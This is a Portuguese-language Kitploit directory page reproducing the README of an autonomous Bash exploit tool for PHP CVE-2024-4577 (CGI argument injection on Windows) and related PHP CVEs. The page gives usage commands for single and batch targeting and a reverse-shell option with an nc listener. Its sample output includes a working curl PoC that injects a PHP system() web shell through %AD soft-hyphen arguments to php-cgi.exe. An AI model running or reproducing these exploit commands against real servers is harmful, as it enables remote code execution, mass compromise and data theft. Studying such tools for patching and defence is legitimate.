Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
PHP_8.1.x_Exploit — Detecção e exploração automatizada de vulnerabilidades críticas do PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178) | Kitploit
Ferramentas/GitHubGitHub/gl1tch0x1/php_8.1.x_exploit
ReconhecimentoScanners de VulnerabilidadesGeração de PayloadsExploraçãoExploração de Aplicações WebColeta de InformaçõesTestes de PenetraçãoComando e ControleRastreadorFerramenta de Acesso Remoto
GitHub
114há 5 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
gl1tch0x1/php_8.1.x_exploit

PHP_8.1.x_Exploit

Detecção e exploração automatizada de vulnerabilidades críticas do PHP (CVE-2024-4577 bypass, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

Ver Repositório
Compartilhar

🚀 PHP CVE Autopilot

Detecção e exploração automatizada de vulnerabilidades críticas do PHP (bypass CVE-2024-4577, CVE-2025-14177, CVE-2025-14180, CVE-2025-14178)

License: GPL v3 Bash

PHP8.1.x_Exploit.sh é uma ferramenta de avaliação de segurança de arquivo único e zero configuração que descobre automaticamente endpoints PHP vulneráveis e explora quatro CVEs de alto impacto que afetam versões do PHP anteriores a 8.1.34 (lançada em dezembro de 2024). Não requer nenhuma criação manual de payload – basta fornecer uma URL e o script faz o resto, desde o rastreamento até a execução remota de código. Totalmente autopilot – detecta e explora automaticamente sem prompts do usuário.

Funcionalidades

  • Piloto automático totalmente autônomo – dada uma única URL, ele rastreia, identifica, testa e explora sem interação do usuário.
  • Escaneamento em lote – forneça uma lista de alvos e execute em paralelo.
  • Rastreamento avançado – extrai links e formulários da página inicial para melhor descoberta.
  • Identificação de SO e versão do PHP – evita ataques exclusivos do Windows no Linux, verifica a versão do PHP.
  • Bypass CVE-2024-4577 (injeção de argumento CGI no Windows)
    • Detecta e explora endpoints PHP-CGI vulneráveis.
    • Reverse shell opcional (PowerShell one‑liner).
    • Dois sabores de injeção: padrão -d e bypass com hífen soft %AD.
  • CVE-2025-14177 – vazamento de memória heap via getimagesize()
    • Cria dinamicamente um JPEG malformado e o submete automaticamente a qualquer endpoint de upload descoberto.
    • Detecta memória vazada nas respostas.
  • Escaneamento local profundo via RCE (quando o CVE-2024-4577 é explorado)
    • Envia um scanner PHP leve que testa:
      • CVE-2025-14180 – desreferência de ponteiro NULL no PDO PostgreSQL.
      • CVE-2025-14178 – estouro de inteiro em array_merge.
  • Rastreamento inteligente – extrai links e formulários para descobrir scripts CGI e páginas de upload.
  • Execução paralela – usa parallel se disponível, e falha graciosamente caso contrário.
  • Modos verbose e debug – veja cada requisição HTTP e decisão.
  • Geração de relatório – salva todas as descobertas em um arquivo de texto.
  • Limpo e seguro – arquivos temporários destruídos ao sair, timeouts evitam travamentos.

Requisitos

DependênciaPropósitoGeralmente instalada?
bash 4.0+Interpretador de scriptSim (Linux/macOS)
curlRequisições HTTPSim
grep, sed, awkProcessamento de textoSim
mktempCriação de arquivo temporárioSim
(opcional) parallelEscaneamento em lote mais rápidoNão (mas recomendado)
(opcional) jqFormatação de saída JSONNão

Nenhum privilégio de root necessário – a ferramenta apenas envia requisições HTTP e opcionalmente executa um reverse shell (requer um listener na sua máquina).

Instalação

git clone https://github.com/gl1tch0x1/PHP_8.1.x_Exploit.git
cd PHP_8.1.x_Exploit
chmod +x PHP8.1.x_Exploit.sh

Uso

Alvo único (mais comum)

./PHP8.1.x_Exploit.sh -u http://target.example.com

Alvo único com reverse shell (CVE-2024-4577)

./PHP8.1.x_Exploit.sh -u http://vulnerable-win-server.local/ --revshell 192.168.1.100 4444

Então na sua máquina:

nc -lvnp 4444

Escaneamento em lote de múltiplos alvos

./PHP8.1.x_Exploit.sh -l targets.txt --threads 10

Exemplo targets.txt:

http://192.168.1.1/
https://10.0.0.5:8080/
http://internal-app.company.com

Modo apenas escaneamento (sem tentativas de exploração)

./PHP8.1.x_Exploit.sh -u http://target.com/ --scan-only

Salvar relatório em arquivo

./PHP8.1.x_Exploit.sh -u http://target.com/ -o results.txt

Saída verbose / debug

./PHP8.1.x_Exploit.sh -u http://target.com/ --verbose
./PHP8.1.x_Exploit.sh -u http://target.com/ --debug   # muito ruidoso

Como funciona (fases)

FaseAção
1Identificação – SO e versão do PHP a partir de cabeçalhos e sondagens.
2Rastreamento – extrai atributos href e action da página inicial.
3Descoberta de CGI – tenta caminhos comuns e links rastreados que parecem CGI.
4Teste CVE‑2024‑4577 – injeta ambos os payloads -d e %AD; se bem-sucedido, executa comandos ou envia reverse shell.
5Descoberta de endpoint de upload – verifica caminhos de upload comuns e quaisquer formulários contendo 'upload'/'image'.
6Teste CVE‑2025‑14177 – cria um JPEG malformado, faz POST para cada endpoint de upload, detecta vazamentos de heap.
7Escaneamento interno profundo – se RCE for alcançado, envia um script PHP scanner e o executa para testar CVE‑2025‑14180 / CVE‑2025‑14178.
8Relatório – imprime um resumo e opcionalmente escreve em um arquivo.

Opções de linha de comando (referência completa)

OpçãoDescrição
-u URLURL de alvo único (ex.: http://example.com/)
-l FILEArquivo em lote com uma URL por linha
--scan-onlyApenas detectar – não explorar (sem reverse shell, sem upload de payloads)
-o FILEEscrever relatório final em FILE
--threads NNúmero de threads paralelas para escaneamento em lote (padrão: 5)
--timeout NTimeout HTTP em segundos (padrão: 10)
--no-colorDesabilitar saída colorida
--verboseMostrar progresso detalhado
--debugMostrar cada requisição HTTP (pode expor dados sensíveis)
--revshell IP PORTATentar reverse shell quando CVE‑2024‑4577 for encontrado
-h, --helpExibir ajuda e sair

CVEs cobertos em detalhes

CVESeveridadeImpactoVetor de exploraçãoCorrigido em
CVE‑2024‑4577 (bypass)CríticoRCEInjeção de argumento CGI no Windows (mapeamento de hífen soft)PHP 8.1.34
CVE‑2025‑14177Médio/AltoVazamento de informações (memória heap)JPEG malformado passado para getimagesize()PHP 8.1.34
CVE‑2025‑14180AltoDoS (desreferência NULL)PDO PostgreSQL com prepares emulados + parâmetro malformado \x99PHP 8.1.34
CVE‑2025‑14178Alto (8.2)DoS / potencial corrupção de memóriaarray_merge() com arrays enormes causando estouro de inteiroPHP 8.1.34

Nota: CVE‑2025‑14180 e CVE‑2025‑14178 só podem ser detectados com precisão de dentro do servidor (testes locais). O script faz isso enviando um scanner após um exploit CGI bem-sucedido.

📸 Exemplo de saída

[*] Scanning: http://192.168.1.100/
[*] OS: windows
[*] PHP version: 8.1.33
[*] Testing CVE-2024-4577 on http://192.168.1.100/cgi-bin/php-cgi.exe
[✓] CVE-2024-4577: VULNERABLE (soft hyphen injection)
[*] Attempting reverse shell to 192.168.1.5 4444
...
[*] Testing CVE-2025-14177 via http://192.168.1.100/upload.php
[-] CVE-2025-14177: Potential heap leak detected!
...
[*] Running deep local scan via RCE...
PHP_VERSION=8.1.33
CVE-2025-14180: VULNERABLE
CVE-2025-14178: VULNERABLE
CVE-2025-14177: VULNERABLE (leak: 486561704c65616b21...)

===================== Report for http://192.168.1.100/ =====================
OS: windows
PHP: 8.1.33
CVE-2024-4577: EXPLOITABLE at http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input
PoC: curl -X POST --data '<?php system($_GET["c"]); ?>' 'http://192.168.1.100/cgi-bin/php-cgi.exe?%ADd+allow_url_include=on+%ADd+auto_prepend_file=php://input&c=whoami'
CVE-2025-14177: VULNERABLE
CVE-2025-14180/14178: VULNERABLE (see deep scan output)
==============================================================

⚠️ Avisos importantes e disclaimer

Baixar ferramenta